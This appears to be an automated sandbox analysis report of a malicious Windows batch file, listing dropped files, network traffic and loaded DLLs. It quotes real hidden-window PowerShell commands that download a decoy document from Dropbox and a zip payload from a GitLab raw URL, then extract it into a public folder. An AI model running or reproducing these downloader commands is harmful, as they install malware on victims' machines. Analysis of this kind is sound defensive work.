            Source: powershell.exe, 0000000F.00000002.1530028772.0000023E01649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.recaptcha.net/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80227000.00000004.00000800.00020000.00000000.sdmp, asyncio-queue.html.17.dr, asyncio-sync.html.17.dr, bisect.html.17.dr, audit_events.html.17.dr, email.utils.html.17.dr, curses.panel.html.17.dr, unicode.html.17.dr, logging-cookbook.html.17.dr, gc.html.17.dr, codeop.html.17.dr, crypto.html.17.dr, sorting.html.17.dr, copy.html.17.dr, datatypes.html.17.dr, bdb.html.17.dr, fileformats.html.17.dr, asyncio-api-index.html.17.dr, asyncio-policy.html.17.dr, gzip.html.17.dr, asyncio.html.17.drString found in binary or memory: https://www.sphinx-doc.org/
            Source: powershell.exe, 00000011.00000002.2448283371.0000022F80901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.textualize.io
            Source: unicode.html.17.drString found in binary or memory: https://www.unicode.org
            Source: unicode.html.17.drString found in binary or memory: https://www.unicode.org/
            Source: unicode.html.17.drString found in binary or memory: https://www.unicode.org/history/
            Source: unicode.html.17.drString found in binary or memory: https://www.unicode.org/reports/tr44/#General_Category_Values
            Source: unicode.html.17.drString found in binary or memory: https://www.unicode.org/versions/latest/#Summary
            Source: unicode.html.17.drString found in binary or memory: https://www.youtube.com/watch?v=MijmeoH9LT4
            Source: asn1.py.17.drString found in binary or memory: https://www.zytrax.com/tech/survival/asn1.html
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownHTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.7:49744 version: TLS 1.2

            System Summary

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_ARC4.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_arc2.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cbc.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Crypto\Util\_cpuid_c.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_cast.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_ecb.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Document\Lib\site-packages\Cryptodome\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFAAC3D0E3517_2_00007FFAAC3D0E35
            Source: pip-24.0-py3-none-any.whl.17.drBinary or memory string: .SLN``r
            Source: classification engineClassification label: mal84.evad.winBAT@28/1038@4/2
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\tmpJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7680:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twrrhlo0.yng.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" "
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\chcp.comKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\18cut04.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\18cut04.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\18cut04.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\18cut04.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp.com 437Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I set "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I goto "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I echo "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe fiNdstr /L /I pause "C:\Users\user\Desktop\18cut04.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe findJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmpJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1', 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user~1\AppData\Local\Temp\\18_Advertising_Campaign_and_Collaboration.docx'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/bose1511/mkt1511/-/raw/main/18Fukrun.zip', 'C:\Users\Public\Document.zip')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
            Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: *.pdbv source: powershell.exe, 0000000D.00000002.1401370832.000001876A252000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: pdb.Pdb(nosigint=True).runcall(f) source: test_zipimport_support.py.17.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 0000000D.00000002.1401370832.000001876A28C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Users\user\AppData\Local\Microsoft.pdb source: powershell.exe, 0000000D.00000002.1400342987.000001876A0F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: <tr class="row-even"><td><p>pdb.Pdb</p></td> source: audit_events.html.17.dr
            Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbal\T source: powershell.exe, 0000000D.00000002.1400342987.000001876A0F2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: <td><p><a class="reference internal" href="pdb.html#pdb.Pdb">[1]</a></p></td> source: audit_events.html.17.dr
            Source: Binary string: 6?ll\System.pdb source: powershell.exe, 0000000D.00000002.1379643388.0000018750022000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: (<a class="reference internal" href="pdb.html#pdb.Pdb" title="pdb.Pdb"><code class="xref py py-class docutils literal notranslate"><span class="pre">pdb.Pdb</span></code></a>) is an example.</p> source: bdb.html.17.dr
            Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000D.00000002.1401370832.000001876A278000.00000004.00000020.00020000.00000000.sdmp
